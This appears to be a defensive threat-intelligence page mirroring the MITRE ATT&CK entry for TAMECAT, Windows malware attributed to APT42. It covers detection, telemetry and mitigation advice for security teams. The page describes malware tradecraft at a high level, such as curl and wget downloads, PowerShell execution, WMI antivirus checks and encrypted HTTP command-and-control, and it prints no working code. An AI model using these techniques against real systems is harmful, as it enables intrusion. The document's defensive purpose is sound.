S1193: TAMECAT
Analyst context for executives and security teams
TAMECAT matters because it is a Windows malware entry associated in ATT&CK with APT42 and described as executing PowerShell or C# content. For leaders, the practical concern is not just the malware name; it is the operating pattern it implies: script-based execution, Windows administration interfaces, web-based command-and-control, tool transfer, encoded or encrypted traffic, and checks for security software. These behaviors can undermine endpoint visibility and delay incident response if PowerShell, WMI, command shell, and outbound web telemetry are incomplete.
Executive priority
Prioritize this as a validation case for Windows endpoint resilience and SOC readiness. Executives should ask whether the organization can prove it collects and reviews the evidence needed to investigate script execution, WMI activity, command shell use, suspicious outbound web traffic, file ingress, and security tool discovery. This object is especially useful for control assurance: it tests whether identity, endpoint logging, network monitoring, and incident response workflows can connect execution activity on a host to follow-on command-and-control behavior.
Technical view
ATT&CK provides no dedicated detection text for TAMECAT, so defenders should pivot to the related techniques: T1047 Windows Management Instrumentation, T1059.001 PowerShell, T1059.003 Windows Command Shell, T1059.005 Visual Basic, T1071.001 Web Protocols, T1105 Ingress Tool Transfer, T1132.001 Standard Encoding, T1518.001 Security Software Discovery, and T1573.001 Symmetric Cryptography. SOC teams should validate Windows-focused detections for unusual PowerShell or C# execution chains, WMI process creation, command shell spawning patterns, script interpreter use, newly transferred tools, and outbound web sessions that may contain encoded or encrypted command-and-control content. IR teams should ensure playbooks preserve process lineage, script content where available, network destinations, downloaded files, and evidence of security software enumeration.
Likely telemetry
- Windows endpoint process creation and parent-child process lineage
- PowerShell execution logs, including script block/module logging where enabled
- WMI activity logs and process creation via WMI
- Command shell execution records
- Visual Basic or Windows scripting host execution evidence where collected
Detection direction
- Do not depend on a malware signature alone; ATT&CK’s available context points to behavior-based coverage across Windows execution, discovery, and command-and-control techniques.
- Tune PowerShell analytics for suspicious encoded commands, unusual invocation contexts, remote execution patterns, and PowerShell spawned by unexpected parent processes, while accounting for legitimate administration activity.
- Validate WMI detections for local or remote command execution, especially where WMI launches script interpreters, cmd.exe, or other execution utilities.
- Correlate command shell, PowerShell, Visual Basic, file download, and outbound web activity into a single timeline rather than reviewing each alert class in isolation.
- Review web protocol monitoring for unusual destinations, uncommon user-agent or URI patterns, repeated beacon-like behavior, and transferred files, while recognizing that encryption and standard encoding can reduce content visibility.
Mitigation priorities
- Establish reliable Windows logging first: process creation, PowerShell, WMI, file creation, and network egress evidence should be available to SOC and IR teams.
- Harden and monitor administrative execution paths such as PowerShell, WMI, command shell, and scripting engines according to business need and least privilege.
- Apply egress monitoring and control for outbound web traffic, with retention sufficient to support incident reconstruction.
- Restrict unnecessary tool transfer paths and monitor creation of new executables, scripts, or payloads on endpoints.
- Review access controls for administrators and service accounts that can use WMI or remote execution mechanisms.
Analyst notes and limits
This take is based on the official ATT&CK S1193 TAMECAT object, its Mandiant external reference, and the supplied relationships. The malware is explicitly described as used by APT42 to execute PowerShell or C# content, and the relationship set links it to execution, discovery, command-and-control, encoding, encryption, and tool transfer techniques. The operational value for defenders is to use TAMECAT as a coverage test for Windows script execution and outbound communications rather than as a standalone indicator-driven detection case.
ATT&CK provides no official detection guidance, aliases, labels, or malware-specific tactics for TAMECAT in the supplied object. The object platform is Windows; some related command-and-control techniques list broader platforms in ATT&CK, but this summary treats TAMECAT validation as Windows-centered. Local conclusions require environment-specific telemetry, baselines, approved administration patterns, and any available indicators from the cited reporting.
TAMECAT
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | TAMECAT has used `cmd.exe` to run the `curl` command.CitationMandiant APT42-untangling |
| Enterprise | T1105 | Ingress Tool Transfer | TAMECAT has used `wget` and `curl` to download additional content.CitationMandiant APT42-untangling |
| Enterprise | T1059.005 | Visual Basic Sub-technique | TAMECAT has used VBScript to query anti-virus products.CitationMandiant APT42-untangling |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | TAMECAT has encoded C2 traffic with Base64.CitationMandiant APT42-untangling |
| Enterprise | T1047 | Windows Management Instrumentation | TAMECAT has used Windows Management Instrumentation (WMI) to query anti-virus products.CitationMandiant APT42-untangling |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | TAMECAT has used AES to encrypt C2 traffic.CitationMandiant APT42-untangling |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | TAMECAT has used Windows Management Instrumentation (WMI) to check for anti-virus products.CitationMandiant APT42-untangling |
| Enterprise | T1059.001 | PowerShell Sub-technique | TAMECAT has used PowerShell to download and run additional content.CitationMandiant APT42-untangling |
| Enterprise | T1071.001 | Web Protocols Sub-technique | TAMECAT has used HTTP for C2 communications.CitationMandiant APT42-untangling |
Groups, software, and campaigns
G1044: APT42
APT42 is an Iranian-sponsored threat group that conducts cyber espionage and surveillance.[1] The group primarily focuses on targets in the Middle East region, but has targeted a variety of industries and countries since at least 2015.[1] APT42 starts cyber operations through spearphishing emails and/or the PINEFLOWER Android malware, then monitors and collects information from the compromised systems and devices.[1] Finally, APT42 exfiltrates data using native features and open-source tools.[2]
APT42 activities have been linked to Magic Hound by other commercial vendors. While there are behavior and software overlaps between Magic Hound and APT42, they appear to be distinct entities and are tracked as separate entities by their originating vendor.
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | d0cadb754d7a… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Mandiant APT42-untangling
Rozmann, O., et al. (2024, May 1). Uncharmed: Untangling Iran's APT42 Operations. Retrieved October 9, 2024.
Open source URL -
[2]
mitre-attack S1193Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.